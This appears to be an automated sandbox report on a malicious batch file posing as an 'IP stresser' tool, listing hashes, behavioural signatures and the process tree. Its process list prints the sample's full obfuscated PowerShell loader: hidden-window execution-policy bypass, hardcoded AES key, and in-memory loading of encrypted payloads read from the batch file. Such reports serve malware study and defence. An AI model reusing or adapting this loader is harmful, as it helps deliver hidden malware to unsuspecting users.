Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-04-2024 02:55
Static task
static1
Behavioral task
behavioral1
Sample
IPstresser.bat
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
IPstresser.bat
Resource
win10v2004-20240426-en
16 signatures
150 seconds
General
-
Target
IPstresser.bat
-
Size
110KB
-
MD5
4cbfab042795f657884a406a51d4ec6f
-
SHA1
c10c313cefe72a09d43dfe1372eb8f200a85860c
-
SHA256
2d6df8a9163bf7b8c59ab0e01b93b8793c94b6513c5af6f7c9c6da493f77ebfb
-
SHA512
8773649c55df56d1c7955aa93a9420daf2852f7bd37e6b32f9a1327db8d70dabad7d2179651bdfab9638dae15a45748eb426dd3a2d68184feafd393308a80622
-
SSDEEP
1536:3cD5OO6WnyqyAQkb7FhNLk56/uXMMAAhtXmVEMCB91Z+qiIwxN/DFzINczTpOL:O5OO6Wyqy3Q7C5wC86Mg91cruSdOL
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2076 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2188 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2076 wrote to memory of 2188 2076 cmd.exe powershell.exe PID 2076 wrote to memory of 2188 2076 cmd.exe powershell.exe PID 2076 wrote to memory of 2188 2076 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\IPstresser.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('la9164c2CHXOtVjsEzb/di2tt2EmrBknsikvZzwy+lA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MG099+K63nybi6ytFcIO9w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UWDjB=New-Object System.IO.MemoryStream(,$param_var); $uPsDm=New-Object System.IO.MemoryStream; $EmRHJ=New-Object System.IO.Compression.GZipStream($UWDjB, [IO.Compression.CompressionMode]::Decompress); $EmRHJ.CopyTo($uPsDm); $EmRHJ.Dispose(); $UWDjB.Dispose(); $uPsDm.Dispose(); $uPsDm.ToArray();}function execute_function($param_var,$param2_var){ $bAAUH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xfGLt=$bAAUH.EntryPoint; $xfGLt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IPstresser.bat';$rfudV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IPstresser.bat').Split([Environment]::NewLine);foreach ($BHjqG in $rfudV) { if ($BHjqG.StartsWith(':: ')) { $uYxXT=$BHjqG.Substring(3); break; }}$payloads_var=[string[]]$uYxXT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2188-4-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmpFilesize
9.6MB
-
memory/2188-5-0x00000000025B0000-0x0000000002630000-memory.dmpFilesize
512KB
-
memory/2188-6-0x000000001B2E0000-0x000000001B5C2000-memory.dmpFilesize
2.9MB
-
memory/2188-7-0x00000000025B0000-0x0000000002630000-memory.dmpFilesize
512KB
-
memory/2188-8-0x0000000002310000-0x0000000002318000-memory.dmpFilesize
32KB
-
memory/2188-9-0x00000000025B0000-0x0000000002630000-memory.dmpFilesize
512KB
-
memory/2188-10-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmpFilesize
9.6MB